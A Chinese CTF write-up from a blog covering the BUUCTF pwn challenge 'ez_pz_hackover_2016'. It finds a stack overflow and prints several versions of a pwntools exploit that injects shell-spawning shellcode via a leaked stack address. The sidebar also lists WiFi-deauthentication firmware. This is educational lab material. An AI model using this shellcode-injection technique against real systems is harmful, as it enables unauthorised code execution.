[BUUCTF-pwn]——ez_pz_hackover_2016

最新推荐文章于 2024-08-28 11:55:31 发布
最新推荐文章于 2024-08-28 11:55:31 发布
阅读量351 收藏 2
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113815386
版权
本文介绍了如何解决一个名为'ez_pz_hackover_2016'的CTF挑战,该挑战涉及到栈溢出漏洞的利用。作者通过检查程序保护设置,发现没有开启NX,因此推测需要编写shellcode。在IDA中分析函数后,找到了可以溢出的vuln函数,并通过输入特定字符串触发。经过调试确定了shellcode的地址和返回地址的计算方式,最终构造出exploit并成功交互。
摘要由CSDN通过智能技术生成

[BUUCTF-pwn]——ez_pz_hackover_2016

checksec一下,NX都没开,十有八九是让自己写shellcode了
在这里插入图片描述
在IDA中,main里面没什么可以看的.
在这里插入图片描述
在chall函数中发现,0x40C = 1036 > 1023无法栈溢出。不过总算找到可以写shellcode 的地方。
在这里插入图片描述
发现vuln函数,只要通过输入"crashme\x00"就可以绕过检查,执行vuln函数。
在这里插入图片描述
并且dest可以栈溢出的因为n 远远大于 0x32。下面就是找到shellcode 的地址,作为返回地址就好了。在pwndbg里面寻找偏移。

我先将exploit大概写出来,如下:

from pwn import *
p=process('./ez_pz_hackover_2016')
gdb.attach(p,'b *0x08048600')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')
s_addr=int(p.recvuntil('\n'),16)
print hex(s_addr)
payload='crashme\x00'.ljust(0x32 + 0x4, '\x00')

payload+= 'this'+shellcode
p.sendline(payload)
p.interactive()

其中,'this’是返回地址,待确定。
在pwndbg中看看
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
修改exploit后为

from pwn import *

p=process('./ez_pz_hackover_2016')
gdb.attach(p,'b *0x08048600')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')

s_addr=int(p.recvuntil('\n'),16)
print hex(s_addr)
payload='crashme\x00'.ljust(0x32 + 0x4, '\x00')

payload+=p32(s_addr)+shellcode
p.sendline(payload)
p.interactive()

结果发现不可以继续调试发现, 返回地址不对。虽然不知道为啥
在这里插入图片描述
但是到ebp的距离是0x16

from pwn import *

p=process('./ez_pz_hackover_2016')
gdb.attach(p,'b *0x08048600')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')

s_addr=int(p.recvuntil('\n'),16)
print hex(s_addr)
payload='crashme\x00'.ljust(0x16 + 0x4 + 0x4, '\x00')

payload+='this'+shellcode
p.sendline(payload)
p.interactive()

在这里插入图片描述
调试确定’this’ 是 p32(s_addr - 0x1c)
所以最终exploit为

exploit

from pwn import *
p=process('./ez_pz_hackover_2016')
shellcode=asm(shellcraft.sh())
p.recvuntil('crash: ')

s_addr=int(p.recvuntil('\n'),16)

payload='crashme\x00'.ljust(0x16 + 0x4, '\x00')
payload+=p32(s_addr-0x1c)+shellcode
p.sendline(payload)
p.interactive()
Y-peak
关注
专栏目录
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2393
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1023
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTFez_pz_hackover_2016
weixin_51055545的博客
02-14 1289
BUUCTFez_pz_hackover_2016】 例行检查 开了relro,其他保护机制都没开,扔到IDA中分析 漏洞分析 chall()函数中,有fgets(),但长度不够覆盖到返回地址,没法溢出,接着会获取s的长度,然后字符串检索,在这里我给出memchr()的定义:*C 库函数 void *memchr(const void str, int c, size_t n) 在参数 str 所指向的字符串的前 n 个字节中搜索第一次出现字符 c(一个无符号字符)的位置。 然后程序会有一个if检查,
BUUCTF ez_pz_hackover_2016
最新发布
m0_73743784的博客
08-28 379
需要注意dest到ebp的距离,使用 IDA Pro 分析时并不一定是正确的,需要配合动态调试才能真正确定利用偏移值可以间接确定写入shellcode。
BUUCTF-ez_pz_hackover_2016
Rt1Text的博客
11-28 457
challC 库函数 - strcmp()C 库函数 int strcmp(const char *str1, const char *str2) 把 str1 所指向的字符串和 str2 所指向的字符串进行比较。strcmp只能比较字符串,比较数组和字符串常量,不能比较数字等其他形式的参数。两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止strcmp的返回值可控,传入空字符串即可strlen同样遇0截断。
memcpy
weixin_45959515的博客
08-26 189
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
[PWN] BUUCTF ez_pz_hackover_2016 1
空城惜梦的博客
06-08 745
[PWN] BUUCTF ez_pz_hackover_2016 1解题分析漏洞利用payload分析输入点与ebp距离的计算方法泄露的地址与shellcode的偏移量payload 解题分析 按照惯例先checksec一下,除了RELRO,其他都没开 执行,观察程序运行逻辑,给出一个地址,然后让我们输入name 32IDA打开程序,观察main函数,header()只是打印图形,chall()才是关键函数 在chall中先输出s的地址,之后fgets接收一个不大于1023(0x3ff)的字符到s的缓
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF pwn ez_pz_hackover_2016(write up)
qq_44768749的博客
08-23 464
BUUCTF pwn ez_pz_hackover_20160x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 没有不可执行栈和段上的读写保护。 0x02 运行 输入name后发现上面还有一个地址。 0x03 IDA 若输入crashme,即可进入vlun函数,主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写 入shellcode,之后的vuln函数会将name的数据复制到vuln的栈上面,而且复制的数据量远远大于栈的 长度,会造
BUUCTF ez_pz_hackover_2016[动态调试之初入门]
weixin_45441024的博客
01-26 575
BUUCTF ez_pz_hackover_2016[动态调试之初入门] 之前做题基本上都是放到IDA里面进行分析,所以在动态调试这方面一直有所欠缺,今天这道题就弥补了这个不足,真正地走进了栈题的动态调试 先check一下,发现什么保护都没有开,还是一个32位的程序,心里不免有些小激动,难道这题简单? 不管简单与否,我们都先运行一下,发现在输入之前回显给我们一个栈地址,并且这个地址不是固定的,所以这里一定会用到,拿小本本记下来,之后程序会将我们输入的东西打印出来 之后我们进到IDA来分析一下这个程序
ez_pz_hackover_2016
、moddemod
06-20 435
exp1 #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * def debug_pause(): print(proc.pidof(p)) pause() context(log_level='debug') proc_name = './ez_pz_hackover_2016' p = process(proc_name) # p = remote('node3.b.
3S软件
Zzzpiu的博客
12-29 478
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
buuctf ez_pz_hackover_2016(ret2shellcode)
carol2358的博客
04-23 819
这题和上次的ret2shellcode不一样,上次的是返回到bss段,这回是返回到栈上,因为本题给出的是栈的一个地址,所以我们通过计算我们输入进去的shellcode对应这个地址的偏移,然后跳到shellcode的栈地址,就可以执行shellcode。 题目大致讲的就是先往s里写数据,然后把s的数据放到dest上,而dest存在栈溢出漏洞 本题的关键就是算出shellcode距离泄漏的s的栈地...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值